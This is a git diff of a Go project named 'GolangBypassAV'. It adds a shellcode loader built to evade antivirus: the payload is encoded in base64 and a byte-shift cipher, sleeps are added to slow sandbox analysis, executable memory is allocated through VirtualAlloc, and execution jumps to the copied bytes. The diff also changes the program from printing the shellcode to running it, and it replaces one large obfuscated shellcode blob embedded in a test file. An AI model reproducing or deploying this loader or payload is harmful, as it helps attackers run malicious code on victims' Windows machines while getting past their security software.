diff --git a/main.go b/main.go index 99a9a83..6e76cef 100644 --- a/main.go +++ b/main.go @@ -1,8 +1,7 @@ package main import ( - "encoding/hex" - "fmt" + "GolangBypassAV/shellcode" "io/ioutil" "os" ) @@ -10,18 +9,8 @@ import ( func main() { if len(os.Args) != 2 { - fmt.Printf("Must have shellcode of file\n") os.Exit(1) } - - sc, err := ioutil.ReadFile(os.Args[1]) - if os.IsNotExist(err) { - sc, err = hex.DecodeString(os.Args[1]) - if err != nil { - fmt.Printf("Error decoding arg 1: %s\n", err) - os.Exit(1) - } - } - fmt.Println(sc) - //shellcode.Run(sc) + sc, _ := ioutil.ReadFile(os.Args[1]) + shellcode.Run(sc) } diff --git a/shellcode/bp.go b/shellcode/bp.go new file mode 100644 index 0000000..22149f9 --- /dev/null +++ b/shellcode/bp.go @@ -0,0 +1 @@ +package shellcode diff --git a/shellcode/main.go b/shellcode/main.go new file mode 100644 index 0000000..a631433 --- /dev/null +++ b/shellcode/main.go @@ -0,0 +1,125 @@ +package shellcode + +import ( + "GolangBypassAV/encry" + "encoding/base64" + "fmt" + "os" + "syscall" + "time" + "unsafe" +) + +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READWRITE = 0x40 +) + +var kk = []byte{0x12} + +func base64Decode(data string) []byte { + data1, _ := base64.StdEncoding.DecodeString(data) + return data1 +} + +func base64Encode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + return bdata +} + +func getEnCode(data []byte) string { + bdata := base64.StdEncoding.EncodeToString(data) + + bydata := []byte(bdata) + var shellcode []byte + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]+kk[0]) + } + return base64.StdEncoding.EncodeToString(shellcode) +} + +var ( + kernel32 = syscall.MustLoadDLL("kernel32.dll") + ntdll = syscall.MustLoadDLL("ntdll.dll") + VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") + RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") +) + +func getDeCode(string2 string) []byte { + + ss, _ := base64.StdEncoding.DecodeString(string2) + string2 = string(ss) + var shellcode []byte + + bydata := []byte(string2) + + for i := 0; i < len(bydata); i++ { + shellcode = append(shellcode, bydata[i]-kk[0]) + } + ssb, _ := base64.StdEncoding.DecodeString(string(shellcode)) + return ssb + +} + +func checkError(err error) { + if err != nil { + if err.Error() != "The operation completed successfully." { + println(err.Error()) + os.Exit(1) + } + } +} + +func genEXE(charcode []byte) { + + addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) + if addr == 0 { + checkError(err) + } + gd() + + _, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) + checkError(err) + + gd() + for j := 0; j < len(charcode); j++ { + charcode[j] = 0 + } + syscall.Syscall(addr, 0, 0, 0, 0) +} + +func gd() int64 { + time.Sleep(time.Duration(2) * time.Second) + + dd := time.Now().UTC().UnixNano() + return dd + 123456 + +} + +func getFileShellCode(file string) []byte { + data := encry.ReadFile(file) + //shellCodeHex := encry.GetBase64Data(data) + //fmt.Print(shellCodeHex) + return data +} + +func getFileShellCode1(file string) string { + data := encry.ReadFile(file) + shellCodeHex := base64Encode(data) + fmt.Print(shellCodeHex) + return shellCodeHex +} + +func Run(string2 []byte) { + //fmt.Println(1) + + //fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin"))) + + dd := getEnCode(string2) + + shellCodeHex := getDeCode(dd) + gd() + genEXE(shellCodeHex) +} diff --git a/test1/main.go b/test1/main.go index aa6c461..5da9995 100644 --- a/test1/main.go +++ b/test1/main.go @@ -16,7 +16,7 @@ const ( PAGE_EXECUTE_READWRITE = 0x40 ) -var kk = []byte{0x11} +var kk = []byte{0x21} func base64Decode(data string) []byte { data1, _ := base64.StdEncoding.DecodeString(data) diff --git a/test2/main.go b/test2/main.go index 5edbb4e..fa286a6 100644 --- a/test2/main.go +++ b/test2/main.go @@ -16,7 +16,7 @@ const ( PAGE_EXECUTE_READWRITE = 0x40 ) -var kk = []byte{0x11} +var kk = []byte{0x13, 0x32} func base64Decode(data string) []byte { data1, _ := base64.StdEncoding.DecodeString(data) @@ -35,7 +35,7 @@ func getEnCode(data []byte) string { var shellcode []byte for i := 0; i < len(bydata); i++ { - shellcode = append(shellcode, bydata[i]+kk[0]) + shellcode = append(shellcode, bydata[i]+kk[0]-kk[1]) } return base64.StdEncoding.EncodeToString(shellcode) } @@ -56,7 +56,7 @@ func getDeCode(string2 string) []byte { bydata := []byte(string2) for i := 0; i < len(bydata); i++ { - shellcode = append(shellcode, bydata[i]-kk[0]) + shellcode = append(shellcode, bydata[i]-kk[0]+kk[1]) } ssb, _ := base64.StdEncoding.DecodeString(string(shellcode)) return ssb @@ -113,7 +113,7 @@ func main() { //fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin"))) - bbdata := "QFZ6VUZhVYCKUlJSUlZXY2JnU2RmZ2taXnVbfWRahWRqVnpdZnl5WnpCWnhkWoWKZlZ4YYVBgVxlZVlbZFVZUoNViXl3UlqEWlZZU4piQlNSdFl6SGdbU2Zmel1melRdYnuJWlJ1U354aXhqVIhbQnSAhlJ6UlJSUlZ6V4hZY39kUlliZlqFWlhWZF1iVFNbUnVVe2d8e0CKZlhdX1p5WlJ1a19edH1aXnRUhGJ0WVtVZlZTiGV7eHV3V15SQYh8VFZmRkFpaWpoVmRdYlRjW1J1U35iaoReZFZkXWJTiVtSdVNTeohkWmRSWWJiZ3lTaFdGa2h8V2piZ31TaHx6VUhUU1Nmh0B4aFZXa2h8el1Whn1hQEBAQGlogFJkc0ZEcmhGgXN+Z0FSVldoZGp/fmVaf4lic4FedYpqWUBKZ1pedH1aXnVbX150U19edH1TZlZXYmJzgEdnf35/QEppg3RCgVp6dFdThlRSVVJSU19edH1TZmZXY3J4X1NmZlhHZ0V+d4mHQGdHQn1zZFp/U2RVWWRkan9qZWVZW2Z+eFJSfFRWZn1bU4aGhWdde4dAQmZ6W4l8elWIQlOCVH1KWnp3V1p6dYFbiUlVQEBAQEBlZVlbZn1bU4Z6QVhYWYdAQmppUlVFaHVSYlJSZGFAYVVFZF5SYlJSR0phgUZSVlJSYHp6QEBAQF1EfUdfi15SfGtoZ3VVdWZScnpKgHJlW1eBRlOFhkaAalZfhmJzc0J5gF14a4p+QHmDemZFd0d8X0mFfWmIi31HcoJYf3mIamSIYIODX15GQGKGYXN4Z1dkf4tHSIZiRIl6ZWpJhINbdlJTZ3RDZ4pdZld/a2hGQWB6U19zRIGBc1iJeV2LZoZeVFKAakNKhXRYV0FyaFuEa2WEeGVnX1tjZFJGXXtSSFpZV3xraV+DWlVahl9URYlee2qLXXtaiF6LhHhnQ32Ga1hKRHSKU2BnVFJDXXtWSFpXdWFni2pBYIpTZnR+fXxraEZBXYtmhl5UfF9UeFJpaX9Dh0JIc2dUSF92il9ci19nQ4lFa0p+g3t6f0iKiWRkfmlnQ35ad3J6UouFglNog3VaXHRagEpaYEpBf4hpfXuLYXR7RXpKZlVqZmJTa2JKSEBZaEB+WXuJholGaEZkRohUZIFCRFViSGWIY354c1aIRVNSiFlIRWN5YXiHfHJDRYE8doRgflxXRX5KSnVnSUqFW3pZeHqEVmlaWkNBRH6Gi4ZeY4hWaH2Ee1hdYWB6X0VBfmBbd1l7Q3xkh1pHWkFKaIBHYmZ3RFV2dEZnWGGJe1lIfkOHc1Z0Z0dzQXeAg4BJVFyKdWSJWkhocoVIWn1lWGeJgXp2gUaDW35nX1mDRXVFi1pSYnNIiIVyW2hASmdaXnR+R1JSU1JSVlhFUlNSUlJWWEZiUlJSUlZYR2hcY2VGd0BnZFtfZWZBeltGQXpbSWZ6W0N8WEVSVFJSUlZ+WzxmWEdWgXJbRYdAZ2RaYVZaWmlSdV1rfnqIdVpSdGBXiFlpaWhXeWpkUmZSUlJSUmZeYYB/QERAQItWil56RUZde1ZCX4pFiV57WlJWe2NodlJOTg==" + bbdata := "ECZKJRYxJVBaIiIiIiYnMzI3IzQ2NzsqLkUrTTQqVTQ6JkotNklJKkoSKkg0KlVaNiZIMVURUSw1NSkrNCUpIlMlWUlHIipUKiYpI1oyEiMiRClKGDcrIzY2Si02SiQtMktZKiJFI05IOUg6JFgrEkRQViJKIiIiIiZKJ1gpM080IikyNipVKigmNC0yJCMrIkUlSzdMSxBaNigtLypJKiJFOy8uRE0qLkQkVDJEKSslNiYjWDVLSEVHJy4iEVhMJCY2FhE5OTo4JjQtMiQzKyJFI04yOlQuNCY0LTIjWSsiRSMjSlg0KjQiKTIyN0kjOCcWOzhMJzoyN00jOExKJRgkIyM2VxBIOCYnOzhMSi0mVk0xEBAQEDk4UCI0QxYUQjgWUUNONxEiJic4NDpPTjUqT1kyQ1EuRVo6KRAaNyouRE0qLkUrLy5EIy8uRE0jNiYnMjJDUBc3T05PEBo5U0QSUSpKRCcjViQiJSIiIy8uRE0jNjYnM0JILyM2NigXNxVOR1lXEDcXEk1DNCpPIzQlKTQ0Ok86NTUpKzZOSCIiTCQmNk0rI1ZWVTctS1cQEjZKK1lMSiVYEiNSJE0aKkpHJypKRVErWRklEBAQEBA1NSkrNk0rI1ZKESgoKVcQEjo5IiUVOEUiMiIiNDEQMSUVNC4iMiIiFxoxURYiJiIiMEpKEBAQEC0UTRcvWy4iTDs4N0UlRTYiQkoaUEI1KydRFiNVVhZQOiYvVjJDQxJJUC1IO1pOEElTSjYVRxdMLxlVTTlYW00XQlIoT0lYOjRYMFNTLy4WEDJWMUNINyc0T1sXGFYyFFlKNToZVFMrRiIjN0QTN1otNidPOzgWETBKIy9DFFFRQyhZSS1bNlYuJCJQOhMaVUQoJxFCOCtUOzVUSDU3LyszNCIWLUsiGCopJ0w7OS9TKiUqVi8kFVkuSzpbLUsqWC5bVEg3E01WOygaFERaIzA3JCITLUsmGConRTE3WzoRMFojNkROTUw7OBYRLVs2Vi4kTC8kSCI5OU8TVxIYQzckGC9GWi8sWy83E1kVOxpOU0tKTxhaWTQ0Tjk3E04qR0JKIltVUiM4U0UqLEQqUBoqMBoRT1g5TUtbMURLFUoaNiU6NjIjOzIaGBApOBBOKUtZVlkWOBY0FlgkNFESFCUyGDVYM05IQyZYFSMiWCkYFTNJMUhXTEITFVEMRlQwTiwnFU4aGkU3GRpVK0opSEpUJjkqKhMRFE5WW1YuM1gmOE1USygtMTBKLxURTjArRylLE0w0VyoXKhEaOFAXMjZHFCVGRBY3KDFZSykYThNXQyZENxdDEUdQU1AZJCxaRTRZKhg4QlUYKk01KDdZUUpGURZTK043LylTFUUVWyoiMkMYWFVCKzgQGjcqLkROFyIiIyIiJigVIiMiIiImKBYyIiIiIiYoFzgsMzUWRxA3NCsvNTYRSisWEUorGTZKKxNMKBUiJCIiIiZOKww2KBcmUUIrFVcQNzQqMSYqKjkiRS07TkpYRSoiRDAnWCk5OTgnSTo0IjYiIiIiIjYuMVBPEBQQEFsmWi5KFRYtSyYSL1oVWS5LKiImSzM4RiIeHg==" shellCodeHex := getDeCode(bbdata) gd() genEXE(shellCodeHex)